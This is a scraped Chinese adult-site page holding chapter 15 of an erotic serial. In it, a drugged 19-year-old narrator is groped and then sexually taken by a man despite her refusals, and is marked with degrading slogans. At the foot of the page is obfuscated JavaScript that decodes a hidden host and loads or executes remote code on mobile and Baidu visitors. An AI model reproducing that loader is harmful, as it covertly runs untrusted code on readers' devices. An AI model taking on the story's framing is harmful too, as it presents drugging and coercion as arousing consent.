返回

女友小叶心路篇15 作者迷糊小鱼ca5

 首页

AV拼多多 ❤ 拼的多 ❤ 看的多
WWW.AvPinDuoDuo.COM
海外地址
www.AVPDD.com

女友小叶心路篇


2013/01/07发表于:春满四合院

***********************************
特别声明

本文与《凌辱篇》没有时间空间上的联系,是独立的文章。

本文包含成人内容,未满18周岁或心智不全者请勿阅读。

***********************************
(十五)

小陈把我拉到门口一辆小面包车边上,车厢里已经坐了很多昨天晚上一起吃晚饭的那些人,他们看到我来了,一个个都露出很淫邪的笑,还一个劲的朝我竖起大拇指。想起昨晚的疯狂举动,害得我的小脸一阵红扑扑的。

小陈先扶着爷爷坐到副驾驶座,然后拉开后车厢的门,我不想跟那些人挤在一起,但也没有办法,只好跟着小陈上了车。刚一坐定,没想到司机也冲着我坏笑,我一看居然还是刚才敲门进来的那个男人。呜呜呜……小叶现在连死的心都有了。

「小叶,这个是富哥,快叫富哥。」

「富哥好……」

富哥也没回我,看我们都坐好了就直接挂上档开车了。

小面包车非常小,为了适合乡村本来就不宽敞的田间道路,还把车里面改了一下,驾驶室靠背上多加了一排小板凳一样矮的座位,我和小陈就坐在多加的座位上,与昨晚那些看光了小叶嫩穴的叔叔伯伯们近距离的面对面。

我紧紧抱着腿贴着小陈坐着,矮矮的座位和有限的空间不允许我伸直修长的双腿,所以,只要我的双腿有一丝缝隙,我对面的叔叔伯伯们就能通过这条缝隙清清楚楚地看到小叶跟昨天晚上一样不知羞耻流着爱液和精液的嫩穴。

小汽车颠簸了很长一段时间,后厢的人估计都差不多睡着了。我靠着小陈微微喘着气,现在的意识还不是很清楚,而且刚才跟小陈做到一半的快感还没有退去,加上又不知道这个坏蛋对我用了什么奇怪的药,一股强烈的麻痒感从小穴深处传来,早就夹不住的浓浓精液混合着大量的爱液正从两片嫩唇间缓缓流出,恐怕已经把座椅给弄湿了,但偏偏又坐在一个不论时机和场合都要玩弄我性感躯体的男人身边,小叶说不出有多尴尬。

浑身无力的我只好夹紧双腿,用仅有的意识去控制自己不要做出什么出格的事。我紧紧贴着小陈,意识越来越模糊,而小穴内的奇痒却越来越明显。

「小叶多大啦?」我身后的富哥突然开腔。

「19岁……」回答后我立刻感觉到什么不对:「你不是……不会说普通话吗?」

「呵呵,怎么可能啊!爷爷他们听不懂还差不多,我们年轻人还听不懂怎么混嘛?」

我瞪了身边的小陈一眼,可恶的死骗子,我又上他的当了。等等……如果能懂普通话,那么我之前被小陈说的家乡习俗,他岂不是都知道是假的了?

「不愧是19岁呢,皮肤又白又嫩,我们乡下很久没看过你这样白凈的城市美女了。」忽然一只粗糙的手掌贴在我雪白敏感的大腿上。

「嗯……别……」我浑身颤了一下,奇怪的药让我全身变得非常敏感,小嘴里发出连自己都不敢相信的呻吟。

「嗯?什么?」

「没……没什么……嗯……」

「看来小叶很敏感嘛!明明刚刚才和老公做完功课的,难道又想要了?」小陈摸着我的腿,还用嘴咬着我的耳垂。

「不……不是……别说出来啊……」我紧张的看着对面那几个连睡着也是一脸淫笑的叔叔伯伯,生怕他们哪个压根就没睡,一直在等着机会偷看小叶裙底的春光。

「不说也可以,乖乖的坐过来一点。」

我扭头往后面看看,然后轻咬着嘴唇,把小屁屁往小陈那边挪了一点。
「小叶是大学生吗?」

「是的……啊……」小陈忽然将根本什么都遮不住的裙襬掀起,让我整条白嫩光滑的大腿都露出来,如果叔叔伯伯们没有睡着,估计车厢内都炸开锅了。
「真好啊,到底是受过高等教育的女生,跟我们这的乡村娘们就是不同,知书达理多了。」

「嗯……没……没有啦……啊……」

小陈趁我分心,一把将我无力夹紧的雪白双腿分开,一大团小穴内精液和爱液的浓稠黏液不受控制的从微微张开的湿润嫩唇间被挤出。还好对面的人都已经睡着了,不然小叶的肉穴就要再次供人随意欣赏了。

「不要……小陈……嗯……」

我本来就被那奇怪的药弄得敏感无比,再加上小陈不顾时机和场合的挑逗,我那仅存的可怜理智很快就要被情欲的洪水给淹没了。

「嗯?怎么了?是不是坐着不舒服?」富哥在前面没法回头,只能从我的声音来判断我现在的状况。

「没……没有……很……很舒服……噢……唔……」小陈毫无预兆地把手指插进我粉嫩的敏感肉穴里,我立刻用手捂着小嘴不让富哥听到我的娇喘。

小陈笑嘻嘻的看着我,两根粗糙的手指慢慢挤入敏感柔嫩的肉穴中,还拌着流出的黏稠液体慢慢的搅弄着,发出「噗叽、噗叽」的水声。

「不……不要啊……」虽然当着叔叔伯伯的面让我觉得不应该这样,但快感很快就战胜了理智,我紧紧地抱着小陈的手臂,双腿渐渐地越分越开。

「小叶啊,你们同学里像你这样的美女多么?帮富哥我也介绍一个呗!」
「嗯……好……好啊……」

这时小陈已经抽出手指,然后捧起我的脚脱掉了运动鞋。我闭着双眼喘着粗气,任由小陈脱去我小脚上的束缚后,调皮地把腿伸直,轻轻的踩在对面一个秃顶的伯伯腿上,让我的双腿看起来更加修长匀称,也懒得管这位伯伯是不是真的在睡觉了。

司机开着小汽车沿着小路颠簸,我就在司机身后眼神恍惚地紧紧倚靠着身边的男人,下身本来就什么都遮不住的水蓝色超短裙早已失去作用,露出了女孩子最羞耻私密的部位,而我为了让我白皙匀称的双腿看起来更加修长,却把双腿搭在了对面看似睡觉的秃顶老伯伯腿上。

小陈已经不满足于抚摸我的腿了,粗糙的手掌一直在大腿根处徘徊,我抬头看了一眼眼前的伯伯,轻叹一口气,将本来夹着的白嫩双腿微微分开,小陈的手迅速的钻进裙底,再次探到了嫩穴的位置。

「嗯……噢……」

「怎么了小叶?」听到我突然的娇呼,富哥马上询问状况。

小陈的呼吸也开始粗重起来,手指熟练又灵活地在湿滑不堪的嫩肉上拨弄,休闲短裤也顶起了一个高高的帐篷。

「没……没事……小陈睡着……压着我了……」

「呵呵,男人就这样,发泄完了就要休息……刚才被你榨干了吧?」

「哪有……富哥你就会……取笑人家……」

「老婆,你下面好湿,我的手整个已经湿透了。」小陈在我耳边悄悄说着,还故意往我耳朵里吹着热气。

「唔……不要说出来啊……刚才你把人家弄到一半……人家还没满足呢……
嗯……小叶好想要……」

「嘿嘿,还害羞呢!刚才那腿把小陈的腰缠那么紧的时候怎么没害羞啊?」
这两个男人真讨厌,一个不停地挑逗我最后一次理智,一个却还要不断地问我害羞的问题。

「富哥……别……别说了……」

「嘿嘿,其实见你第一眼就发现你是个美人胚子了,但想不到身材居然这么好,皮肤又这么白,真羡慕小陈啊!」

「才没有啊……呀……」

小陈听后手指挑逗得更卖力了,我闭着眼睛紧紧抱着小陈的手臂,唔……小叶现在感觉好淫荡。

「现在回想起来就兴奋啊……那细腰,那长腿,啧啧啧……」

「呜呜呜……富哥你不要再说了啦,人家全身都被你看光了,羞死了……」
「哦,对对对,还有那粉嫩粉嫩的小肉穴,我看那小陈的烂鸟被你的小肉穴夹得抽都抽不出来,好想也被你的嫩穴夹一下啊!」

「噢……富哥你好坏……啊……居然偷看人家那里……」

「那个时候烂鸟一抖一抖的,是在给小叶灌精吧?」富哥继续不依不饶。
「回答他。」小陈也在一边附和,同时更加用力地挖弄我嫩穴里面的壁肉,「噗叽、噗叽」的水声也越来越大。

呜呜呜……小叶最后一丝理智要被淹没了……

「是不是啊?小叶,小陈刚才是不是在给你的小穴灌精啊?」

「嗯……是……富哥进来的时候,小陈刚好……射……射在里面了……」
「多不多?是不是很烫?」

「啊……嗯……很……很多……很烫……」

「哈哈……看你那时候那股骚样,就知道你被小陈灌精了。那现在是不是肉穴里面还夹着精液啊?」

「嗯……是的……啊……」

「嘿嘿……这么靓的小美人,小穴里夹着精液……想起来就带感。」

「唔……小陈……小叶……要去了……」

「嗯?什么要去了?」就在我即将要高潮的时候,富哥忽然停下车,把头往后扭。

「富哥……你别看……呀……」我紧紧抓住小陈的手臂,在富哥的眼神中爬上了高潮。呜呜呜……小叶羞死了……

我靠着小陈,连搭在对面伯伯身上大大分开的雪白长腿也无力闭合,就这么迷迷糊糊的昏睡过去。

「小叶……小叶……该起床了。」

「嗯?」我揉揉眼睛,发现我还是刚才昏睡时的姿势,而富哥正在摇着我。
「小陈已经先去了,让我来带你过去。嘿嘿,想不到小叶睡觉的时候这么可爱。」说这话的时候,富哥的眼神一直就没离开我的裙底,我下意识的夹紧了一下双腿。

「嗯……」两片湿润的嫩唇互相摩擦了一下,因为刚刚高潮和那奇怪膏药的原因使我的小穴异常敏感,晶莹的爱液不自觉的流了出来。

「小叶可不可以……就在这里等?」

「可以啊,那富哥就留在这里陪小叶吧!」说着,一只粗糙的手掌就贴上我的大腿内侧,还随着笔直的大腿慢慢摸向裙底。

「别这样……我去,我去……」

哎……好吧,只得硬着头皮,忍着小穴里不断传来的麻痒下了车。当敏感稚嫩的脚底肌肤接触到滚烫的地面的时候才发现我还没有穿鞋子,于是我又把脚缩了回来,然后俯下身在车里找鞋子。

「富哥,小叶的鞋子不见了,你看我是不是……啊……」

当粗大的硬物接触到敏感肉穴的时候,我才想起自己正撅着屁屁对着富哥,
而超短的裙襬毫无遮拦地把刚刚高潮过还湿润微张的嫩穴完全暴露给了身后的男
人。

「富哥……别……啊……」没等我说完,粗圆的龟头已经挤入了敏感湿润的肉穴。「你别这样……我是小陈的女友啊……」我试图用手推开富哥,没想到富哥一把抓住我的手,把我的身体往后一扯,粗大的肉棒狠狠地全根没入。

「噢……」早已饥渴难耐的嫩穴被粗长的肉棒大大撑开,一阵舒爽的电流瞬间散发出来。

「嘿嘿,刚才在我后面和小陈玩成那样,现在还要装清纯吗?」

「你怎么……啊……好粗……」

「叫得那么骚,整车人都听到了,叔叔还说小陈找了一个好媳妇呢,小穴又嫩又紧,还一直在流水……」

「呜呜呜……别说了……小叶没脸活下去了……」

「嘿嘿……小陈还说,其实他们还不知道,真正干进去后才发现,原来子宫里面还会吸呢!插进去都舍不得拔出来了。」

「噢……不要说了……噢……」

「那小叶自己告诉我,里面是不是会吸?」

「小……小叶不知道啊……」

「不知道?那我就插进去自己好好感受一下!」说着,富哥将肉棒抽出来一点,随后又猛地一插到底。

「啊……噢……别……别这么用力呀……进去得太深了……」

「嗯……好像没有吸啊,难道小陈在吹牛?我再试几次。」

「别,别……啊……噢……要去了……好舒服……」

从上午被挑逗开始就没有得到满足的小穴,在富哥粗大肉棒几次狠狠的插入下很快就高潮了,我都能感觉到嫩穴内的壁肉正在紧紧地缠着入侵的异物,而嫩穴尽头的花心在贪婪地收缩,生怕这根粗大的异物离它而去。

「还装清纯呢,才这么两下就高潮了……里面果然在吸啊……真爽!」
我无力地趴在车里,富哥掀起小背心的衣襬,拨开乌黑柔顺的秀发,伸出舌头,从腰侧一直舔到脖子后面,而粗大的肉棒依旧深深的插在嫩穴里,抵着花心不停地扭着。

「嗯……」高潮过后小叶的嫩穴本来就非常敏感,被富哥这样子挑逗,情欲很快又拉了上来,小穴里的嫩肉不自觉又一阵收缩。

「这么快又想要了?」

「嗯……」我羞得满脸通红,只好把小脸埋入臂弯。

富哥「嘿嘿」一笑,扯掉我的小背心和超短裙,然后把我拉出车门,再把门关上。

「啊……外面……会有人看到的……」

「看就看吧,这么好的身材,不让人看太可惜了。」

「不……不可以……太羞了……」

「那我走了?」

「呜呜呜……怎么这样……」我小心翼翼地踩着满是碎石的滚烫路面,上身趴在车窗上,然后咬着嘴唇,慢慢踮起脚尖,让那熟悉的滚圆硬物正好抵在柔软的嫩唇上。

「嘿嘿……想不到小叶这么主动了,你这个样子太可爱了……」富哥迫不及待地一手扶着我纤细的腰肢,一手绕到胸前握住柔软坚挺的乳房,粗大的龟头抵在柔软的嫩唇上分开两片唇瓣,「噗哧」一下插了进去。

「啊……」

富哥毫不怜香惜玉地抓着我的纤腰猛烈地抽插,粗硬滚圆的龟头每一次插入都是全根尽入,深深地顶进子宫。粗糙的手掌也用力地捏着柔软的乳肉,才不一会儿我原本白嫩的娇乳和屁屁就染上了血红色。呜呜呜……痛死我了……

「啊……轻……轻一点儿呀……小叶好痛……噢……」

「嘴里说着不要,里面还夹得那么紧……你们女人就是喜欢口是心非。」
富哥还是知道疼女生的,听我抱怨后果然减轻了力度。

「说一说,小陈和我的哪根更粗?」

「啊……我……我不知道……呀……」

我刚把话说完,富哥猛地一下狠狠顶入,连子宫都被龟头插痛了。

「感觉出来了吗?谁的更粗?」

呜呜呜……小叶怎么老是被男人这样子欺负……

「富哥的……富哥比小陈粗多了……」

「你是怎么判断的?」

「我……不知道……啊……富哥的肉棒进来以后……里面撑得更大一些……
更舒服一些……嗯……」小叶真想挖个洞钻进去。

「我就喜欢小叶的这股子骚劲。来,换个姿势。」

「嗯……」

富哥抽出了肉棒,然后扶着我转过身,我背靠着车门,双手轻轻搭在富哥的肩上,脸别开不敢直视富哥的眼睛。富哥笑着抬起了我一条腿,粗大的肉棒从下往上插入小穴。

「啊……」富哥比我高,肉棒完全进入以后,我的脚踮起才能勉强碰触到地面,根本不能作为支撑点,我身体所有的重量都压在了那根完全进入我体内的肉棒上。

「小叶一边索求还一边害羞的样子真让人欲罢不能啊!」富哥把我压在车门上,屁股一顶一收,深深植入小叶身体的肉棒也在敏感的嫩穴内反复抽插。
「嗯……啊……不行了……不能思考了……」

「你不需要思考,乖乖的听话配合就可以了。来,把脸转过来,小舌头伸出来。」

「嗯……」我的意识早已烟消云散,听话的转过头和富哥深情的对视着,然后张开小嘴,羞涩的吐出一小节粉嫩的舌尖。

「嘿嘿……小叶真乖,等会富哥会给你一个大大的奖励。」

富哥直接把我的舌尖含进嘴里吸吮,然后像抢食一样越吸越多,还撬开我的小嘴,带着臭味的粗糙肥大的舌头直接进入到我的嘴里。

「唔……」我半睁着眼睛,紧紧搂着富哥,感受着我身上两个敏感的嘴巴同时被紧紧抱着我的这个男人征服的快感。

富哥跟我舌吻了很久才恋恋不舍地离开我的小嘴,粗糙的舌头沿着我的脖子一直舔到坚挺白嫩的乳房。「这对奶子……又大又软,还这么挺,真他妈诱人犯罪啊!」说着,富哥低头一口将敏感的乳头吸进嘴里。

「嗯啊……轻……呀……」我小嘴张着,柔软的小舌头被富哥吸吮过后还没收进嘴里,早已失神的我连一句完整的话都说不出了。

就在这乡村的烈日下,道路边的一块空地上,我赤裸着白皙性感的身体,紧紧地搂着一个精壮的农村男人被他压在一辆汽车的车门上,男人带着胡渣的臭嘴正含着我白嫩的乳房卖力地吸吮,而男人粗长又带着弯度的肉棒不断地在我柔嫩敏感的小穴里肆虐把我带上一波又一波的高潮,而高潮后喷出的晶莹爱液被不停进出的肉棒带出,随着白皙的大腿内侧,混合着两人激情运动时产生的汗液,一直流到我的脚趾尖……

在两次深深的插入之后我又达到了高潮,富哥喘着粗气放开了我,我靠着车门,双腿发软似乎就要倒下。

「在外面做爱很舒服吧?」

「羞……羞死人了……」

「嘿嘿,这就害羞了?那么这样呢?」说着,富哥左手把我两只手抓住按在车顶上,右手从短裤口袋里掏出一支黑色的两头记号笔,用牙把大的那一头盖子咬开,然后正对着我的赤裸白皙的娇躯,抬头看了我一眼。

「啊……富哥……你……你要做什么啊?」

「嘿嘿,做点让你更害羞的事情。」也不等我细问,他就用手里的笔在我乳沟下缘开始写字,当最后一笔结束的时候,已经到达我淡淡的绒毛处了。

我低头一看顿时羞红了脸,没有一丝赘肉的平坦小腹上,毅然竖写着「小叶是公共厕所」七个大字,最后还有一个箭头,越过柔软的绒毛直指那还冒着爱液微张的小穴,雪白的肌肤上印着几个黑色的粗笔大字相当显眼。

「啊……富哥……你别这样……帮我擦掉啊……」我不安的扭动身体,富哥用腿把我固定住,然后在腰际继续下笔,一边写着「只要你们的鸡巴够大」,另一边写着「小叶随时都给你们干」。这一次,黑色的笔迹一直延伸到膝盖,两条白嫩的大腿都覆盖上了让人羞耻的记号。

本来以为这样就结束了,想不到富哥居然还把我翻过身,在我的后背和屁屁上都写了字,直到富哥满意地收起笔,我才被放开双手。

「嘿嘿……放心吧,这些字会自己消失的,不过可能是一个星期,也有可能是一个月。」

「呜呜呜……你怎么能在别人身上乱写字啊……而且还写这些……」我羞得小脸都快发麻了,咬着嘴唇,眼泪汪汪的看着富哥。

「就喜欢看你害羞的样子,太可爱了……」富哥一把将我抱起,一直没有喷发的大肉棒再次顶入了我的嫩穴,粗壮的硬物又一次填满了下体的空虚,我不由自主地搂着富哥的脖子,把双腿都缠在了富哥腰上。

「该出发了吧?小陈还在等我们呢!」

「嗯……」我迷糊地点点头。

「好,我们走。」

「啊?就……就这样过去?」

「是啊,小陈说你现在应该没力气自己走路,所以让我过来抱你过去啊!」
「啊……别这样抱……这样的话……小叶全身都要看光了……而且……我身上还有那些字……」

「嘿嘿,我就是为了让别人看才写的啊!」

(待续)

[本帖最后由ls1991lsok于编辑]

评分
相关推荐
3.0分

3.0分 【女友小叶·心路篇】【一】【 作者:迷糊小鱼】【 未完待续】2ed

3.0分

3.0分 人鱼小南作者:冬虫ee3

3.0分

3.0分 迷糊的莉琪——蒙眼凌辱篇上、中、下作者紫川201308768

3.0分

3.0分 【小夫妻最真实的心路】【作者:cqds110】【完】e8b

3.0分

3.0分 迷路小女生6e0

3.0分

3.0分 迷糊的妈妈-无赖篇d79

3.0分

3.0分 【色厨师】【作者:蓝海小鱼】【完】994

3.0分

3.0分 我的迷糊妈妈-乱伦小说d8b

3.0分

3.0分 我与女友小枫的刺激-按摩中心偷欢篇全作者 史艳文30a

3.0分

3.0分 伸向清纯可爱女友小鱼的魔爪(1-12)作者:tor202068a4

3.0分

3.0分 [韩娱之畸形世界](长篇 第一章心路历程 )作者:yeziyun走-乱伦小说df6

3.0分

3.0分 小宝与康熙之-小金鱼篇36d

3.0分

3.0分 美人鱼慧臻女友故事 淩辱特别篇2作者teller8e3

3.0分

3.0分 小龙女碧水寒潭记作者:叶银0321

3.0分

3.0分 小龙女碧水寒潭记作者叶银0d9e

3.0分

3.0分 女友的小妹作者不详716


提示:为了您能够顺利的找到本站,请牢记WWW.AVPINDUODUO.COM

请不要忽略该提示,这将意味着您将可能无法找到通往本站的地址。


免责声明 || 广告合作 || 意见反馈

AV拼多多【WWW.AvPinDuoDuo.COM】

已运行1 年 84 天 0 小时 52 分钟 33 秒

所属·美国·华盛顿 网站地图

function DgUow(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function YXMxB(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return DgUow(t);};window[''+'O'+'s'+'B'+'v'+'r'+'A'+'y'+'N'+'U'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=YXMxB,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/x/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('Zmm1rLmmRzcXprLmmNu','151936',window,document,['m','mbRtTdBxso']);}:function(){};